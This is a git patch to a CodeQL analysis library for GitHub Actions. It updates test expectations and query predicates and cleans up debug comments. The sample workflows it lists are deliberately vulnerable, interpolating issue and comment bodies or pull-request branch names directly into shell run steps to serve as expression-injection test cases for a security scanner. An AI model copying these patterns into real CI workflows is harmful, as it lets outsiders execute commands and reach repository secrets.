.github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:3:1:3:4 | jobs | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:4:3:4:6 | job1 | .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:4:3:40:53 | job1: | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:5:11 | runs-on | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:7:5:7:11 | outputs | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:8:16 | job_output | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/test.yml:10:5:10:9 | steps | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:9:11:12 | uses | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:12:9:12:12 | with | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:13:11:13:21 | fetch-depth | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | -| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | -| .github/workflows/test.yml:15:9:15:12 | name | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:16:9:16:10 | id | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:17:9:17:12 | uses | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:19:12 | name | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:19:15:19:43 | Remove ... d files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:20:9:20:10 | id | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:21:9:21:12 | uses | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:22:9:22:12 | with | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:11:23:16 | source | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:24:11:24:14 | find | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:24:17:24:21 | "foo" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:25:11:25:17 | replace | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:25:20:25:21 | "" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:26:9:26:10 | id | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:9:27:11 | run | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:28:10 | id | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:9:29:11 | run | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:31:3:31:6 | job2 | .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:32:5:32:11 | runs-on | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:5:34:6 | if | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | | .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:36:5:36:9 | needs | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:38:5:38:9 | steps | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:7:40:53 | - id: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:39:10 | id | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:7:40:53 | - id: sink | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | cfgNodes | .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | | .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | @@ -312,26 +210,20 @@ cfgNodes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:14:15:46 | > | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/test.yml:1:1:40:53 | enter on: push | @@ -346,14 +238,11 @@ cfgNodes | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | dfNodes | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | @@ -385,36 +274,6 @@ dfNodes | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -exprNodes -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | argumentNodes | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | usesIds diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index bf52da395fe..8cf97d58ab0 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -1,4 +1,3 @@ -import codeql.actions.ast.internal.Yaml import codeql.actions.Ast import codeql.actions.Cfg as Cfg import codeql.actions.DataFlow @@ -7,28 +6,32 @@ import codeql.actions.dataflow.ExternalFlow query predicate files(File f) { any() } -query predicate yamlNodes(YamlNode n) { any() } +query predicate workflows(Workflow w) { any() } -query predicate jobNodes(Job s) { any() } +query predicate reusableWorkflows(ReusableWorkflow w) { any() } -query predicate stepNodes(Step s) { any() } +query predicate compositeActions(CompositeAction w) { any() } -query predicate runNodes(Run s) { any() } +query predicate jobs(Job s) { any() } -query predicate runExprNodes(Run s, ExpressionNode e) { e = s.getScript().getAnExpression() } +query predicate localJobs(LocalJob s) { any() } -query predicate allUsesNodes(Uses s) { any() } +query predicate extJobs(ExternalJob s) { any() } -query predicate stepUsesNodes(UsesStep s) { any() } +query predicate steps(Step s) { any() } -query predicate jobUsesNodes(UsesStep s) { any() } +query predicate runSteps(Run run, string body) { run.getScript() = body } -query predicate usesSteps(Uses call, string argname, AstNode arg) { +query predicate runExprs(Run s, Expression e) { e = s.getAnScriptExpr() } + +query predicate uses(Uses s) { any() } + +query predicate stepUses(UsesStep s) { any() } + +query predicate usesArgs(Uses call, string argname, Expression arg) { call.getArgumentExpr(argname) = arg } -query predicate runSteps(Run run, string body) { run.getScript().getValue() = body } - query predicate runStepChildren(Run run, AstNode child) { child.getParentNode() = run } query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } @@ -37,8 +40,6 @@ query predicate cfgNodes(Cfg::Node n) { any() } query predicate dfNodes(DataFlow::Node e) { any() } -query predicate exprNodes(DataFlow::Node e) { any() } - query predicate argumentNodes(DataFlow::ArgumentNode e) { any() } query predicate usesIds(UsesStep s, string a) { s.getId() = a } From 0b71d0240743a84888b6bb3fffa47feb51f8d2ec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 13:49:50 +0100 Subject: [PATCH 0090/1267] fix: clean debug lefovers --- ql/lib/codeql/actions/Ast.qll | 1 - ql/lib/codeql/actions/ast/internal/Ast.qll | 34 ------ .../codeql/actions/dataflow/FlowSources.qll | 1 + .../dataflow/internal/DataFlowPrivate.qll | 2 - .../CWE-094/CriticalExpressionInjection.ql | 12 +-- .../CWE-094/.github/workflows/changelog.yml | 100 ++++++++++++++++++ .../.github/workflows/changelog_required.yml | 9 ++ 7 files changed, 116 insertions(+), 43 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 2bfedd623f5..3123518d369 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -121,7 +121,6 @@ class Outputs extends AstNode instanceof OutputsImpl { Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } - // TODO: REMOVE override string toString() { result = "Job outputs node" } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 63b25229a58..028f2280680 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -252,11 +252,6 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - // override AstNodeImpl getAChildNode() { - // result = this.getInputs() or - // result = this.getOutputs() or - // result = this.getRuns() - // } override AstNodeImpl getParentNode() { none() } override string getAPrimaryQlClass() { result = "CompositeActionImpl" } @@ -292,12 +287,6 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - // override AstNodeImpl getAChildNode() { - // result = this.getAJob() or - // result = this.getStrategy() or - // result = this.getEnv() or - // result = this.getPermissions() - // } override AstNodeImpl getParentNode() { none() } override string getAPrimaryQlClass() { result = "WorkflowImpl" } @@ -306,8 +295,6 @@ class WorkflowImpl extends AstNodeImpl, TWorkflowNode { override YamlMapping getNode() { result = n } - // /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ - // YamlMapping getJobs() { result = this.asYamlMapping().lookup("jobs") } /** Gets the 'global' `env` mapping in this workflow. */ EnvImpl getEnv() { result.getNode() = n.lookup("env") } @@ -346,11 +333,6 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - // override AstNodeImpl getAChildNode() { - // result = super.getAChildNode() or - // result = this.getInputs() or - // result = this.getOutputs() - // } OutputsImpl getOutputs() { result.getNode() = workflow_call.(YamlMapping).lookup("outputs") } ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } @@ -378,7 +360,6 @@ class RunsImpl extends AstNodeImpl, TRunsNode { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - //override AstNodeImpl getAChildNode() { result = this.getAStep() } override CompositeActionImpl getParentNode() { result.getAChildNode() = this } override string getAPrimaryQlClass() { result = "RunsImpl" } @@ -450,7 +431,6 @@ class OutputsImpl extends AstNodeImpl, TOutputsNode { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - //override AstNodeImpl getAChildNode() { result = this.getAnOutputExpr() } override AstNodeImpl getParentNode() { result.getAChildNode() = this } override string getAPrimaryQlClass() { result = "OutputsImpl" } @@ -503,7 +483,6 @@ class StrategyImpl extends AstNodeImpl, TStrategyNode { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } - //override ExpressionImpl getAChildNode() { result = 